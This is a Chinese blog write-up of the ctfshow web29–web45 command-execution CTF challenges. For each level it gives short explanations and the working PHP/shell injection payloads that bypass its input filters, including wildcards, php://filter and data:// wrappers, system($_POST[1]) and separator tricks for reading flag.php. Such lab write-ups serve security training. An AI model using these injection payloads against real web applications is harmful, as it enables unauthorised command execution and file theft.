ctfshow web入门 命令执行

已于 2022-02-19 17:28:50 修改
阅读量446 收藏 1
点赞数
分类专栏: # 网络安全 文章标签: 前端
于 2022-02-12 21:46:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cywxh0125/article/details/122901417
版权

web29

查看目录

由于flag被过滤,可以使用通配符进行绕过,查看flag.php

c=system("nl fla?????");

web30

在上一道题的基础上多了system和php

运用反引号查看目录 并查看flag.php(flag php被过滤 运用通配符)

web31

又加上了点、单引号和空格被过滤。我们可以通过shell中eval命令进行变量嵌套替换

c=eval($_GET[1]);&1=echo `nl flag.php `;

web32

过滤了括号以及分号
%0a换行符
include函数不用括号 分号可以用?>代替

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web 33

多过滤了一个双引号,用require函数

c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web 34  35

与上面类似  只是多过滤了符号

c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web36

相比较增加了  过滤数字

将include的参数1改成字母,include的无括号包含可以不用空格

payload:?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

web37

看到include函数,说明需要我们利用include函数命令执行,这里可以使用伪协议,同时利用字符串逃逸,绕过过滤

data伪协议命令执行:data:text/plain,<php代码; ?>

构造

payload:?c=data:text/plain; <?php system($_POST[1]);?>   POST: 1=tac flag.php

利用POST提交的参数1进行逃逸绕过正则

 

web38

 相比于web37  多过滤了php和 file使用data协议不过是base64编码或者用<?= ?>来代替php

?c=data://text/palin,<?=system('cat fla?.???');?>

web39

同上一题

web40

 

过滤了好多符号

看题解

c=show_source(next(array_reverse(scandir(pos(localeconv())))));

 只过滤了中文括号 没有过滤英文括号

?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
?c=show_source(array_rand(array_flip(scandir(current(localeconv()))));

web42

 

题解

/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔
输出黑洞

c=tac flag.php;

    1:> 代表重定向到哪里,例如:echo “123” > /home/123.txt
    2:/dev/null 代表空设备文件
    3:2> 表示stderr标准错误
    4:& 表示等同于的意思,2>&1,表示2的输出重定向等同于1
    5:1 表示stdout标准输出,系统默认值是1,所以">/dev/null"等同于 “1>/dev/null”
    因此,>/dev/null 2>&1 也可以写成“1> /dev/null 2> &1”

?c=tac flag.php;ls
;前面的被执行了返回结果,后面的执行了被放入/dev/null中

web43

 

在这基础上又过滤了; cat

c=cp flag.php 1.txt||
c=nl flag.php||
c=tac flag.php||

web44

 

c=tac fl*.php||
c=cp fl*.php 1.txt||

web45

 

 

题解
%09是Tab的url编码
payload:

c=tac%09fl*.php||
你怎么睡得着的!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
flag.php
萍水间人的小天地
01-29 1835
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
引入flag.php文件,flagphp中咋解决
weixin_33982355的博客
03-10 2517
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
flag就在flag.php
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
2024年网安最全ctfshow-web-命令执行
最新发布
2401_84264610的博客
05-01 67
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
【CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 888
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
文件包含漏洞
weixin_63231007的博客
03-22 1088
定义: 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 危险函数: include() , include_once() , require() , require_once(). 解题思路: 本地文件包含: 直接读取目标机上的Flag文件. 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件. 判断本地文件包含与远程文件包含方法: ...
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1672
ctfshow web
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
引入flag.php文件,WEB_flag在index里
weixin_28888459的博客
03-10 812
题解:打开题目 点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路 题目标题就说明了,flag在index中,要用到php的封装协议,在文件后缀添加 ?file=php://filter/read=convert.base64-encode/resource=index.php即http://123.206...
pwnable.kr第二遍---uaf cmd1 cmd2
leeham的博客
03-16 406
&gt;&gt;&gt;&gt;uafC++程序逆向gdb-peda看对方服务器上虚表的地址x/3gx 0x11caca0???通过虚表的index来完成函数调用是非常有可能?还是一定会???找到虚函数表??地址的格式\xuse after free:当一个内存块被释放之后再次被使用,下边这些情况:1.内存被释放后,其对应的指针被设置为NULL,然后再次使用,程序会崩溃2.内存块被释放后,其对应的...
ctfshow web入门 (命令执行)
m0_69289738的博客
09-04 133
这题与上题相似,多过滤了一个system和php,这题就使用反引号执行代码,因为php被过滤,所以用问号代替。使用system('ls')看到有flag.php,直接cat flag.php,查看源代码得到flag。使用system命令把flag.php记录到1.txt。输入system('ls')发现flag.php。我们使用问号代替,再次访问,拿到flag。或者tac flag.php得到flag。我们直接访问flag.php是不会显示的。发现不行,因为flag被过滤了。访问1.txt,拿到flag
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2577
web篇(php_rce)详解
PHP中flag参数,flag命令行参数解析flag包)
weixin_39864571的博客
03-21 1274
import "flag"概述索引例子概述Flag 包实现了命令行标志解析。用法:使用 flag.String(),Bool(),Int() 等定义标志。这声明了一个整型 flag,-flagname,都存储在指针 ip 中,类型为 *int 。import"flag"varip=flag.Int("flagname",1234,"helpmessageforflagname")...
BugkuCTF(flag.php)
痴人说梦梦中人
03-27 1327
点开发现login根本没用,抓包发现是get请求POST请求要比get安全,大部分涉密数据都用POST请求,如下图: 既然是get请求了,常见套路就是传递参数,正好有提示hint,构造URL如图,获取源码 阅读代码发现,如果get参数为hint,给你展示源码,否则反序列化的$cookie=$KEY时给你flag,再否则还是那个登录页面,仔细看你就会发现下边的$KEY的值是迷惑你的,卵用没得,...
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你怎么睡得着的!

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值